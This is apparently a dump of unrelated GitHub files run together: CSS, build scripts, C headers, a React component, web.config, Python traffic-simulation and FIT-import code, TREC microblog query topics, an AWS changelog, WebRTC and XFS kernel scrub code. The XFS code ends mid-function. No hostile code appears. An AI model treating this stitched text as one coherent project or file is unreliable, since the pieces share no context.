.dd2-handle[class*="btn-"]:hover { background:rgba(0,0,0,0.08) !important; } .dd-dragel .dd2-handle[class*="btn-"] { border-color:transparent; border-right-color:#EEE; } .dd2-handle.btn-yellow { text-shadow:none !important; background:rgba(0,0,0,0.05) !important; border-right:1px solid #FFF; } 
.dd2-handle.btn-yellow:hover { background:rgba(0,0,0,0.08) !important; } .dd-dragel .dd2-handle.btn-yellow { border-color:transparent; border-right-color:#FFF; } .dd-item > .dd2-handle .drag-icon { display:none; } .dd-dragel > .dd-item > .dd2-handle .drag-icon { display:inline; } .dd-dragel > .dd-item > .dd2-handle .normal-icon { display:none; } } .enable_plugin_nestable_list();
{ "pile_set_name": "Github" }
BIND=../../../../bin SRCD=../.. SRCF=$(basename $2 .rom) redo-ifchange $BIND/a redo-ifchange $SRCD/asrt.i $SRCD/asrt.asm redo-ifchange $SRCD/dict.asm a from $SRCF.asm to $3 quiet
{ "pile_set_name": "Github" }
/* Matrix_and_Pitch.h * * Copyright (C) 1992-2011,2015 Paul Boersma * * This code is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or (at * your option) any later version. * * This code is distributed in the hope that it will be useful, but * WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. * See the GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this work. If not, see <http://www.gnu.org/licenses/>. */ #include "Matrix.h" #include "Pitch.h" autoMatrix Pitch_to_Matrix (Pitch me); autoPitch Matrix_to_Pitch (Matrix me); /* End of file Matrix_and_Pitch.h */
{ "pile_set_name": "Github" }
import React from 'react' import { Query } from 'react-apollo' import get from 'lodash/get' import query from 'queries/Network' function withNetwork(WrappedComponent) { const WithNetwork = props => { return ( <Query query={query}> {({ data }) => { return ( <WrappedComponent networkId={get(data, 'web3.networkId')} networkName={get(data, 'web3.networkName')} {...props} /> ) }} </Query> ) } return WithNetwork } export default withNetwork
{ "pile_set_name": "Github" }
<?xml version="1.0"?> <configuration> <configSections> <sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"> <section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" /> <section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" /> </sectionGroup> </configSections> <system.web.webPages.razor> <host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" /> <pages pageBaseType="System.Web.Mvc.WebViewPage"> <namespaces> <add namespace="System.Web.Mvc" /> <add namespace="System.Web.Mvc.Ajax" /> <add namespace="System.Web.Mvc.Html" /> <add namespace="System.Web.Routing" /> </namespaces> </pages> </system.web.webPages.razor> <appSettings> <add key="webpages:Enabled" value="false" /> </appSettings> <system.web> <httpHandlers> <add path="*" verb="*" type="System.Web.HttpNotFoundHandler"/> </httpHandlers> <!-- Enabling request validation in view pages would cause validation to occur after the input has already been processed by the controller. By default MVC performs request validation before a controller processes the input. To change this behavior apply the ValidateInputAttribute to a controller or action. 
--> <pages validateRequest="false" pageParserFilterType="System.Web.Mvc.ViewTypeParserFilter, System.Web.Mvc, Version=5.2.3.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" pageBaseType="System.Web.Mvc.ViewPage, System.Web.Mvc, Version=5.2.3.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" userControlBaseType="System.Web.Mvc.ViewUserControl, System.Web.Mvc, Version=5.2.3.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"> <controls> <add assembly="System.Web.Mvc, Version=5.2.3.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" namespace="System.Web.Mvc" tagPrefix="mvc" /> </controls> </pages> </system.web> <system.webServer> <validation validateIntegratedModeConfiguration="false" /> <handlers> <remove name="BlockViewHandler"/> <add name="BlockViewHandler" path="*" verb="*" preCondition="integratedMode" type="System.Web.HttpNotFoundHandler" /> </handlers> </system.webServer> </configuration>
{ "pile_set_name": "Github" }
"use strict"; function __export(m) { for (var p in m) if (!exports.hasOwnProperty(p)) exports[p] = m[p]; } Object.defineProperty(exports, "__esModule", { value: true }); __export(require("./db"));
{ "pile_set_name": "Github" }
"""Evaluates the baseline performance of grid1 without RL control. Baseline is an actuated traffic light provided by SUMO. """ import numpy as np from flow.core.experiment import Experiment from flow.core.params import TrafficLightParams from flow.benchmarks.grid1 import flow_params from flow.benchmarks.grid1 import N_ROWS from flow.benchmarks.grid1 import N_COLUMNS def grid1_baseline(num_runs, render=True): """Run script for the grid1 baseline. Parameters ---------- num_runs : int number of rollouts the performance of the environment is evaluated over render: bool, optional specifies whether to the gui during execution Returns ------- flow.core.experiment.Experiment class needed to run simulations """ sim_params = flow_params['sim'] env_params = flow_params['env'] # define the traffic light logic tl_logic = TrafficLightParams(baseline=False) phases = [{'duration': '31', 'minDur': '5', 'maxDur': '45', "state": "GrGr"}, {'duration': '2', 'minDur': '2', 'maxDur': '2', "state": "yryr"}, {'duration': '31', 'minDur': '5', 'maxDur': '45', "state": "rGrG"}, {'duration': '2', 'minDur': '2', 'maxDur': '2', "state": "ryry"}] for i in range(N_ROWS*N_COLUMNS): tl_logic.add('center'+str(i), tls_type='actuated', phases=phases, programID=1) # modify the rendering to match what is requested sim_params.render = render # set the evaluation flag to True env_params.evaluate = True flow_params['env'].horizon = env_params.horizon exp = Experiment(flow_params) results = exp.run(num_runs) total_delay = np.mean(results['returns']) return total_delay if __name__ == '__main__': runs = 1 # number of simulations to average over res = grid1_baseline(num_runs=runs, render=False) print('---------') print('The total delay across {} runs is {}'.format(runs, res))
{ "pile_set_name": "Github" }
/** @file
  GUIDs used as HII FormSet and HII Package list GUID in SecureBootConfigDxe driver.

Copyright (c) 2011, Intel Corporation. All rights reserved.<BR>
This program and the accompanying materials
are licensed and made available under the terms and conditions of the BSD License
that accompanies this distribution.  The full text of the license may be found at
http://opensource.org/licenses/bsd-license.php.

THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.

**/

#ifndef __SECUREBOOT_CONFIG_HII_GUID_H__
#define __SECUREBOOT_CONFIG_HII_GUID_H__

//
// GUID {5daf50a5-ea81-4de2-8f9b-cabda9cf5c14} identifying the Secure Boot
// configuration HII form set.
//
#define SECUREBOOT_CONFIG_FORM_SET_GUID \
  { \
    0x5daf50a5, 0xea81, 0x4de2, {0x8f, 0x9b, 0xca, 0xbd, 0xa9, 0xcf, 0x5c, 0x14} \
  }

//
// GUID instance declared for consumers; presumably defined in the driver's
// package declaration — confirm against the .dec file.
//
extern EFI_GUID gSecureBootConfigFormSetGuid;

#endif
{ "pile_set_name": "Github" }
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title></title> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta name="generator" content="Doxygen 1.8.8"/> <link rel="stylesheet" type="text/css" href="search.css"/> <script type="text/javascript" src="all_1.js"></script> <script type="text/javascript" src="search.js"></script> </head> <body class="SRPage"> <div id="SRIndex"> <div class="SRStatus" id="Loading">Loading...</div> <div id="SRResults"></div> <script type="text/javascript"><!-- createResults(); --></script> <div class="SRStatus" id="Searching">Searching...</div> <div class="SRStatus" id="NoMatches">No Matches</div> <script type="text/javascript"><!-- document.getElementById("Loading").style.display="none"; document.getElementById("NoMatches").style.display="none"; var searchResults = new SearchResults("searchResults"); searchResults.Search(); --></script> </div> </body> </html>
{ "pile_set_name": "Github" }
<top> <num> Number: MB001 </num> <title> BBC World Service staff cuts </title> <querytime> Tue Feb 08 12:30:27 +0000 2011 </querytime> <querytweettime> 34952194402811904 </querytweettime> </top> <top> <num> Number: MB002 </num> <title> 2022 FIFA soccer </title> <querytime> Tue Feb 08 18:51:44 +0000 2011 </querytime> <querytweettime> 35048150574039040 </querytweettime> </top> <top> <num> Number: MB003 </num> <title> Haiti Aristide return </title> <querytime> Tue Feb 08 21:32:13 +0000 2011 </querytime> <querytweettime> 35088534306033665 </querytweettime> </top> <top> <num> Number: MB004 </num> <title> Mexico drug war </title> <querytime> Wed Feb 02 17:22:14 +0000 2011 </querytime> <querytweettime> 32851298193768448 </querytweettime> </top> <top> <num> Number: MB005 </num> <title> NIST computer security </title> <querytime> Fri Feb 04 17:44:09 +0000 2011 </querytime> <querytweettime> 33581589627666432 </querytweettime> </top> <top> <num> Number: MB006 </num> <title> NSA </title> <querytime> Tue Feb 08 16:00:59 +0000 2011 </querytime> <querytweettime> 35005178885181441 </querytweettime> </top> <top> <num> Number: MB007 </num> <title> Pakistan diplomat arrest murder </title> <querytime> Tue Feb 08 22:56:33 +0000 2011 </querytime> <querytweettime> 35109758973255680 </querytweettime> </top> <top> <num> Number: MB008 </num> <title> phone hacking British politicians </title> <querytime> Mon Feb 07 17:42:59 +0000 2011 </querytime> <querytweettime> 34668458591395840 </querytweettime> </top> <top> <num> Number: MB009 </num> <title> Toyota Recall </title> <querytime> Tue Feb 08 21:41:26 +0000 2011 </querytime> <querytweettime> 35090855064764416 </querytweettime> </top> <top> <num> Number: MB010 </num> <title> Egyptian protesters attack museum </title> <querytime> Sat Jan 29 20:06:35 +0000 2011 </querytime> <querytweettime> 31443107291598848 </querytweettime> </top> <top> <num> Number: MB011 </num> <title> Kubica crash </title> <querytime> Sun Feb 06 10:38:43 +0000 2011 
</querytime> <querytweettime> 34199299428581376 </querytweettime> </top> <top> <num> Number: MB012 </num> <title> Assange Nobel peace nomination </title> <querytime> Mon Jan 31 21:02:33 +0000 2011 </querytime> <querytweettime> 32181966761631744 </querytweettime> </top> <top> <num> Number: MB013 </num> <title> Oprah Winfrey half-sister </title> <querytime> Mon Jan 24 15:43:41 +0000 2011 </querytime> <querytweettime> 29565006546735104 </querytweettime> </top> <top> <num> Number: MB014 </num> <title> release of "The Rite" </title> <querytime> Wed Feb 02 12:31:02 +0000 2011 </querytime> <querytweettime> 32778015167479808 </querytweettime> </top> <top> <num> Number: MB015 </num> <title> Thorpe return in 2012 Olympics </title> <querytime> Sun Jan 30 12:20:25 +0000 2011 </querytime> <querytweettime> 31688182005235712 </querytweettime> </top> <top> <num> Number: MB016 </num> <title> release of "Known and Unknown" </title> <querytime> Mon Jan 24 17:03:52 +0000 2011 </querytime> <querytweettime> 29585186899365888 </querytweettime> </top> <top> <num> Number: MB017 </num> <title> White Stripes breakup </title> <querytime> Wed Feb 02 19:13:40 +0000 2011 </querytime> <querytweettime> 32879343399084032 </querytweettime> </top> <top> <num> Number: MB018 </num> <title> William and Kate fax save-the-date </title> <querytime> Wed Jan 26 08:59:32 +0000 2011 </querytime> <querytweettime> 30188073790742528 </querytweettime> </top> <top> <num> Number: MB019 </num> <title> Cuomo budget cuts </title> <querytime> Mon Feb 07 23:25:02 +0000 2011 </querytime> <querytweettime> 34754540519563264 </querytweettime> </top> <top> <num> Number: MB020 </num> <title> Taco Bell filling lawsuit </title> <querytime> Sun Feb 06 07:09:20 +0000 2011 </querytime> <querytweettime> 34146608102772736 </querytweettime> </top> <top> <num> Number: MB021 </num> <title> Emanuel residency court rulings </title> <querytime> Sat Jan 29 03:03:30 +0000 2011 </querytime> <querytweettime> 31185639047172097 </querytweettime> 
</top> <top> <num> Number: MB022 </num> <title> healthcare law unconstitutional </title> <querytime> Tue Feb 01 22:17:34 +0000 2011 </querytime> <querytweettime> 32563233118224385 </querytweettime> </top> <top> <num> Number: MB023 </num> <title> Amtrak train service </title> <querytime> Tue Feb 08 20:04:25 +0000 2011 </querytime> <querytweettime> 35066441501900800 </querytweettime> </top> <top> <num> Number: MB024 </num> <title> Super Bowl, seats </title> <querytime> Tue Feb 08 17:11:04 +0000 2011 </querytime> <querytweettime> 35022813232373760 </querytweettime> </top> <top> <num> Number: MB025 </num> <title> TSA airport screening </title> <querytime> Thu Feb 03 19:52:09 +0000 2011 </querytime> <querytweettime> 33251413001764864 </querytweettime> </top> <top> <num> Number: MB026 </num> <title> US unemployment </title> <querytime> Fri Feb 04 14:10:51 +0000 2011 </querytime> <querytweettime> 33527910379814912 </querytweettime> </top> <top> <num> Number: MB027 </num> <title> reduce energy consumption </title> <querytime> Fri Feb 04 04:19:58 +0000 2011 </querytime> <querytweettime> 33379210437337088 </querytweettime> </top> <top> <num> Number: MB028 </num> <title> Detroit Auto Show </title> <querytime> Wed Jan 26 22:46:12 +0000 2011 </querytime> <querytweettime> 30396111764066304 </querytweettime> </top> <top> <num> Number: MB029 </num> <title> global warming and weather </title> <querytime> Tue Feb 08 01:05:57 +0000 2011 </querytime> <querytweettime> 34779934836785152 </querytweettime> </top> <top> <num> Number: MB030 </num> <title> Keith Olbermann new job </title> <querytime> Tue Feb 08 22:51:01 +0000 2011 </querytime> <querytweettime> 35108366829232128 </querytweettime> </top> <top> <num> Number: MB031 </num> <title> Special Olympics athletes </title> <querytime> Fri Feb 04 08:44:02 +0000 2011 </querytime> <querytweettime> 33445664922800129 </querytweettime> </top> <top> <num> Number: MB032 </num> <title> State of the Union and jobs </title> <querytime> Fri Feb 04 
02:08:22 +0000 2011 </querytime> <querytweettime> 33346093525762048 </querytweettime> </top> <top> <num> Number: MB033 </num> <title> Dog Whisperer Cesar Millan's techniques </title> <querytime> Thu Jan 27 19:27:54 +0000 2011 </querytime> <querytweettime> 30708594202648576 </querytweettime> </top> <top> <num> Number: MB034 </num> <title> MSNBC Rachel Maddow </title> <querytime> Fri Feb 04 22:42:20 +0000 2011 </querytime> <querytweettime> 33656631187210241 </querytweettime> </top> <top> <num> Number: MB035 </num> <title> Sargent Shriver tributes </title> <querytime> Mon Jan 24 07:18:17 +0000 2011 </querytime> <querytweettime> 29437816727404544 </querytweettime> </top> <top> <num> Number: MB036 </num> <title> Moscow airport bombing </title> <querytime> Mon Jan 24 23:00:35 +0000 2011 </querytime> <querytweettime> 29674954899333120 </querytweettime> </top> <top> <num> Number: MB037 </num> <title> Giffords' recovery </title> <querytime> Thu Feb 03 18:05:03 +0000 2011 </querytime> <querytweettime> 33224462191038464 </querytweettime> </top> <top> <num> Number: MB038 </num> <title> protests in Jordan </title> <querytime> Tue Feb 01 12:46:40 +0000 2011 </querytime> <querytweettime> 32419560749531136 </querytweettime> </top> <top> <num> Number: MB039 </num> <title> Egyptian curfew </title> <querytime> Fri Jan 28 18:14:09 +0000 2011 </querytime> <querytweettime> 31052423128686592 </querytweettime> </top> <top> <num> Number: MB040 </num> <title> Beck attacks Piven </title> <querytime> Mon Jan 31 20:33:37 +0000 2011 </querytime> <querytweettime> 32174687102435328 </querytweettime> </top> <top> <num> Number: MB041 </num> <title> Obama birth certificate </title> <querytime> Mon Jan 31 17:55:54 +0000 2011 </querytime> <querytweettime> 32134993337647104 </querytweettime> </top> <top> <num> Number: MB042 </num> <title> Holland Iran envoy recall </title> <querytime> Mon Feb 07 20:47:13 +0000 2011 </querytime> <querytweettime> 34714824982134784 </querytweettime> </top> <top> <num> 
Number: MB043 </num> <title> Kucinich olive pit lawsuit </title> <querytime> Sat Jan 29 08:06:05 +0000 2011 </querytime> <querytweettime> 31261786745339904 </querytweettime> </top> <top> <num> Number: MB044 </num> <title> White House spokesman replaced </title> <querytime> Fri Jan 28 13:35:45 +0000 2011 </querytime> <querytweettime> 30982361281728512 </querytweettime> </top> <top> <num> Number: MB045 </num> <title> political campaigns and social media </title> <querytime> Tue Feb 01 12:52:29 +0000 2011 </querytime> <querytweettime> 32421023961841667 </querytweettime> </top> <top> <num> Number: MB046 </num> <title> Bottega Veneta </title> <querytime> Tue Feb 08 22:34:59 +0000 2011 </querytime> <querytweettime> 35104330025541632 </querytweettime> </top> <top> <num> Number: MB047 </num> <title> organic farming requirements </title> <querytime> Tue Feb 08 00:12:47 +0000 2011 </querytime> <querytweettime> 34766556445540352 </querytweettime> </top> <top> <num> Number: MB048 </num> <title> Egyptian evacuation </title> <querytime> Mon Jan 31 09:36:57 +0000 2011 </querytime> <querytweettime> 32009428471386112 </querytweettime> </top> <top> <num> Number: MB049 </num> <title> carbon monoxide law </title> <querytime> Tue Feb 01 22:44:23 +0000 2011 </querytime> <querytweettime> 32569981321347074 </querytweettime> </top> <top> <num> Number: MB050 </num> <title> war prisoners, Hatch Act </title> <querytime> Tue Jan 25 02:13:11 +0000 2011 </querytime> <querytweettime> 29723425576587264 </querytweettime> </top>
{ "pile_set_name": "Github" }
"""Class for importing monitoring FIT files into a database.""" __author__ = "Tom Goetz" __copyright__ = "Copyright Tom Goetz" __license__ = "GPL" import sys import logging from tqdm import tqdm import Fit from utilities import FileProcessor from fit_file_processor import FitFileProcessor logger = logging.getLogger(__file__) logger.addHandler(logging.StreamHandler(stream=sys.stdout)) root_logger = logging.getLogger() class FitData(object): """Class for importing FIT files into a database.""" def __init__(self, input_dir, ignore_dev_fields, debug, latest=False, recursive=False, fit_types=None, measurement_system=Fit.field_enums.DisplayMeasure.metric): """ Return an instance of FitData. Parameters: input_dir (string): directory (full path) to check for monitoring data files debug (Boolean): enable debug logging latest (Boolean): check for latest files only fit_types (Fit.field_enums.FileType): check for this file type only measurement_system (enum): which measurement system to use when importing the files """ logger.info("Processing %s FIT data from %s", fit_types, input_dir) self.measurement_system = measurement_system self.ignore_dev_fields = ignore_dev_fields self.debug = debug self.fit_types = fit_types self.file_names = FileProcessor.dir_to_files(input_dir, Fit.file.name_regex, latest, recursive) def file_count(self): """Return the number of files that will be processed.""" return len(self.file_names) def process_files(self, db_params): """Import FIT files into the database.""" fp = FitFileProcessor(db_params, self.ignore_dev_fields, self.debug) for file_name in tqdm(self.file_names, unit='files'): try: fit_file = Fit.file.File(file_name, self.measurement_system) if self.fit_types is None or fit_file.type in self.fit_types: fp.write_file(fit_file) root_logger.info("Wrote Fit file %s type %s to the database", file_name, fit_file.type) else: root_logger.info("skipping non-matching %s file %s type %r message types %r", self.fit_types, file_name, fit_file.type, 
fit_file.message_types) except Exception as e: logger.error("Failed to parse %s: %s", file_name, e) root_logger.error("Failed to parse %s: %s", file_name, e)
{ "pile_set_name": "Github" }
[
    {
        "type": "api-change",
        "category": "CloudFront",
        "description": "You can now specify additional options for MinimumProtocolVersion, which controls the SSL\/TLS protocol that CloudFront uses to communicate with viewers. The minimum protocol version that you choose also determines the ciphers that CloudFront uses to encrypt the content that it returns to viewers."
    },
    {
        "type": "api-change",
        "category": "EC2",
        "description": "You are now able to create and launch EC2 P3 instances, the next generation of GPU instances, optimized for machine learning and high performance computing applications. With up to eight NVIDIA Tesla V100 GPUs, P3 instances provide up to one petaflop of mixed-precision, 125 teraflops of single-precision, and 62 teraflops of double-precision floating point performance, as well as a 300 GB\/s second-generation NVLink interconnect that enables high-speed, low-latency GPU-to-GPU communication. P3 instances also feature up to 64 vCPUs based on custom Intel Xeon E5 (Broadwell) processors, 488 GB of DRAM, and 25 Gbps of dedicated aggregate network bandwidth using the Elastic Network Adapter (ENA)."
    }
]
{ "pile_set_name": "Github" }
<div style="margin:15px; "> <form method="post" action="#{ActionLink}"> <div>#{cssForm}</div> </form> </div>
{ "pile_set_name": "Github" }
/*
 *  Copyright 2020 The WebRTC Project Authors. All rights reserved.
 *
 *  Use of this source code is governed by a BSD-style license
 *  that can be found in the LICENSE file in the root of the source
 *  tree. An additional intellectual property rights grant can be found
 *  in the file PATENTS.  All contributing project authors may
 *  be found in the AUTHORS file in the root of the source tree.
 */

#include "rtc_base/network_route.h"

namespace rtc {

// Endpoints are equal only when every identifying field matches.
bool RouteEndpoint::operator==(const RouteEndpoint& other) const {
  if (adapter_type_ != other.adapter_type_)
    return false;
  if (adapter_id_ != other.adapter_id_)
    return false;
  if (network_id_ != other.network_id_)
    return false;
  return uses_turn_ == other.uses_turn_;
}

// Routes are equal when connectivity state, both endpoints, overhead and
// the last-sent packet id all agree.
bool NetworkRoute::operator==(const NetworkRoute& other) const {
  if (connected != other.connected)
    return false;
  if (local != other.local)
    return false;
  if (remote != other.remote)
    return false;
  if (packet_overhead != other.packet_overhead)
    return false;
  return last_sent_packet_id == other.last_sent_packet_id;
}

}  // namespace rtc
{ "pile_set_name": "Github" }
// SPDX-License-Identifier: GPL-2.0+ /* * Copyright (C) 2017 Oracle. All Rights Reserved. * Author: Darrick J. Wong <[email protected]> */ #include "xfs.h" #include "xfs_fs.h" #include "xfs_shared.h" #include "xfs_format.h" #include "xfs_trans_resv.h" #include "xfs_mount.h" #include "xfs_defer.h" #include "xfs_btree.h" #include "xfs_bit.h" #include "xfs_log_format.h" #include "xfs_trans.h" #include "xfs_sb.h" #include "xfs_inode.h" #include "xfs_alloc.h" #include "xfs_ialloc.h" #include "xfs_ialloc_btree.h" #include "xfs_icache.h" #include "xfs_rmap.h" #include "xfs_log.h" #include "xfs_trans_priv.h" #include "scrub/xfs_scrub.h" #include "scrub/scrub.h" #include "scrub/common.h" #include "scrub/btree.h" #include "scrub/trace.h" /* * Set us up to scrub inode btrees. * If we detect a discrepancy between the inobt and the inode, * try again after forcing logged inode cores out to disk. */ int xfs_scrub_setup_ag_iallocbt( struct xfs_scrub_context *sc, struct xfs_inode *ip) { return xfs_scrub_setup_ag_btree(sc, ip, sc->try_harder); } /* Inode btree scrubber. */ /* * If we're checking the finobt, cross-reference with the inobt. * Otherwise we're checking the inobt; if there is an finobt, make sure * we have a record or not depending on freecount. */ static inline void xfs_scrub_iallocbt_chunk_xref_other( struct xfs_scrub_context *sc, struct xfs_inobt_rec_incore *irec, xfs_agino_t agino) { struct xfs_btree_cur **pcur; bool has_irec; int error; if (sc->sm->sm_type == XFS_SCRUB_TYPE_FINOBT) pcur = &sc->sa.ino_cur; else pcur = &sc->sa.fino_cur; if (!(*pcur)) return; error = xfs_ialloc_has_inode_record(*pcur, agino, agino, &has_irec); if (!xfs_scrub_should_check_xref(sc, &error, pcur)) return; if (((irec->ir_freecount > 0 && !has_irec) || (irec->ir_freecount == 0 && has_irec))) xfs_scrub_btree_xref_set_corrupt(sc, *pcur, 0); } /* Cross-reference with the other btrees. 
*/ STATIC void xfs_scrub_iallocbt_chunk_xref( struct xfs_scrub_context *sc, struct xfs_inobt_rec_incore *irec, xfs_agino_t agino, xfs_agblock_t agbno, xfs_extlen_t len) { struct xfs_owner_info oinfo; if (sc->sm->sm_flags & XFS_SCRUB_OFLAG_CORRUPT) return; xfs_scrub_xref_is_used_space(sc, agbno, len); xfs_scrub_iallocbt_chunk_xref_other(sc, irec, agino); xfs_rmap_ag_owner(&oinfo, XFS_RMAP_OWN_INODES); xfs_scrub_xref_is_owned_by(sc, agbno, len, &oinfo); xfs_scrub_xref_is_not_shared(sc, agbno, len); } /* Is this chunk worth checking? */ STATIC bool xfs_scrub_iallocbt_chunk( struct xfs_scrub_btree *bs, struct xfs_inobt_rec_incore *irec, xfs_agino_t agino, xfs_extlen_t len) { struct xfs_mount *mp = bs->cur->bc_mp; xfs_agnumber_t agno = bs->cur->bc_private.a.agno; xfs_agblock_t bno; bno = XFS_AGINO_TO_AGBNO(mp, agino); if (bno + len <= bno || !xfs_verify_agbno(mp, agno, bno) || !xfs_verify_agbno(mp, agno, bno + len - 1)) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); xfs_scrub_iallocbt_chunk_xref(bs->sc, irec, agino, bno, len); return true; } /* Count the number of free inodes. */ static unsigned int xfs_scrub_iallocbt_freecount( xfs_inofree_t freemask) { BUILD_BUG_ON(sizeof(freemask) != sizeof(__u64)); return hweight64(freemask); } /* Check a particular inode with ir_free. 
*/ STATIC int xfs_scrub_iallocbt_check_cluster_freemask( struct xfs_scrub_btree *bs, xfs_ino_t fsino, xfs_agino_t chunkino, xfs_agino_t clusterino, struct xfs_inobt_rec_incore *irec, struct xfs_buf *bp) { struct xfs_dinode *dip; struct xfs_mount *mp = bs->cur->bc_mp; bool inode_is_free = false; bool freemask_ok; bool inuse; int error = 0; if (xfs_scrub_should_terminate(bs->sc, &error)) return error; dip = xfs_buf_offset(bp, clusterino * mp->m_sb.sb_inodesize); if (be16_to_cpu(dip->di_magic) != XFS_DINODE_MAGIC || (dip->di_version >= 3 && be64_to_cpu(dip->di_ino) != fsino + clusterino)) { xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); goto out; } if (irec->ir_free & XFS_INOBT_MASK(chunkino + clusterino)) inode_is_free = true; error = xfs_icache_inode_is_allocated(mp, bs->cur->bc_tp, fsino + clusterino, &inuse); if (error == -ENODATA) { /* Not cached, just read the disk buffer */ freemask_ok = inode_is_free ^ !!(dip->di_mode); if (!bs->sc->try_harder && !freemask_ok) return -EDEADLOCK; } else if (error < 0) { /* * Inode is only half assembled, or there was an IO error, * or the verifier failed, so don't bother trying to check. * The inode scrubber can deal with this. */ goto out; } else { /* Inode is all there. */ freemask_ok = inode_is_free ^ inuse; } if (!freemask_ok) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); out: return 0; } /* Make sure the free mask is consistent with what the inodes think. */ STATIC int xfs_scrub_iallocbt_check_freemask( struct xfs_scrub_btree *bs, struct xfs_inobt_rec_incore *irec) { struct xfs_owner_info oinfo; struct xfs_imap imap; struct xfs_mount *mp = bs->cur->bc_mp; struct xfs_dinode *dip; struct xfs_buf *bp; xfs_ino_t fsino; xfs_agino_t nr_inodes; xfs_agino_t agino; xfs_agino_t chunkino; xfs_agino_t clusterino; xfs_agblock_t agbno; int blks_per_cluster; uint16_t holemask; uint16_t ir_holemask; int error = 0; /* Make sure the freemask matches the inode records. 
*/ blks_per_cluster = xfs_icluster_size_fsb(mp); nr_inodes = XFS_OFFBNO_TO_AGINO(mp, blks_per_cluster, 0); xfs_rmap_ag_owner(&oinfo, XFS_RMAP_OWN_INODES); for (agino = irec->ir_startino; agino < irec->ir_startino + XFS_INODES_PER_CHUNK; agino += blks_per_cluster * mp->m_sb.sb_inopblock) { fsino = XFS_AGINO_TO_INO(mp, bs->cur->bc_private.a.agno, agino); chunkino = agino - irec->ir_startino; agbno = XFS_AGINO_TO_AGBNO(mp, agino); /* Compute the holemask mask for this cluster. */ for (clusterino = 0, holemask = 0; clusterino < nr_inodes; clusterino += XFS_INODES_PER_HOLEMASK_BIT) holemask |= XFS_INOBT_MASK((chunkino + clusterino) / XFS_INODES_PER_HOLEMASK_BIT); /* The whole cluster must be a hole or not a hole. */ ir_holemask = (irec->ir_holemask & holemask); if (ir_holemask != holemask && ir_holemask != 0) { xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); continue; } /* If any part of this is a hole, skip it. */ if (ir_holemask) { xfs_scrub_xref_is_not_owned_by(bs->sc, agbno, blks_per_cluster, &oinfo); continue; } xfs_scrub_xref_is_owned_by(bs->sc, agbno, blks_per_cluster, &oinfo); /* Grab the inode cluster buffer. */ imap.im_blkno = XFS_AGB_TO_DADDR(mp, bs->cur->bc_private.a.agno, agbno); imap.im_len = XFS_FSB_TO_BB(mp, blks_per_cluster); imap.im_boffset = 0; error = xfs_imap_to_bp(mp, bs->cur->bc_tp, &imap, &dip, &bp, 0, 0); if (!xfs_scrub_btree_xref_process_error(bs->sc, bs->cur, 0, &error)) continue; /* Which inodes are free? */ for (clusterino = 0; clusterino < nr_inodes; clusterino++) { error = xfs_scrub_iallocbt_check_cluster_freemask(bs, fsino, chunkino, clusterino, irec, bp); if (error) { xfs_trans_brelse(bs->cur->bc_tp, bp); return error; } } xfs_trans_brelse(bs->cur->bc_tp, bp); } return error; } /* Scrub an inobt/finobt record. 
*/ STATIC int xfs_scrub_iallocbt_rec( struct xfs_scrub_btree *bs, union xfs_btree_rec *rec) { struct xfs_mount *mp = bs->cur->bc_mp; xfs_filblks_t *inode_blocks = bs->private; struct xfs_inobt_rec_incore irec; uint64_t holes; xfs_agnumber_t agno = bs->cur->bc_private.a.agno; xfs_agino_t agino; xfs_agblock_t agbno; xfs_extlen_t len; int holecount; int i; int error = 0; unsigned int real_freecount; uint16_t holemask; xfs_inobt_btrec_to_irec(mp, rec, &irec); if (irec.ir_count > XFS_INODES_PER_CHUNK || irec.ir_freecount > XFS_INODES_PER_CHUNK) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); real_freecount = irec.ir_freecount + (XFS_INODES_PER_CHUNK - irec.ir_count); if (real_freecount != xfs_scrub_iallocbt_freecount(irec.ir_free)) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); agino = irec.ir_startino; /* Record has to be properly aligned within the AG. */ if (!xfs_verify_agino(mp, agno, agino) || !xfs_verify_agino(mp, agno, agino + XFS_INODES_PER_CHUNK - 1)) { xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); goto out; } /* Make sure this record is aligned to cluster and inoalignmnt size. */ agbno = XFS_AGINO_TO_AGBNO(mp, irec.ir_startino); if ((agbno & (xfs_ialloc_cluster_alignment(mp) - 1)) || (agbno & (xfs_icluster_size_fsb(mp) - 1))) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); *inode_blocks += XFS_B_TO_FSB(mp, irec.ir_count * mp->m_sb.sb_inodesize); /* Handle non-sparse inodes */ if (!xfs_inobt_issparse(irec.ir_holemask)) { len = XFS_B_TO_FSB(mp, XFS_INODES_PER_CHUNK * mp->m_sb.sb_inodesize); if (irec.ir_count != XFS_INODES_PER_CHUNK) 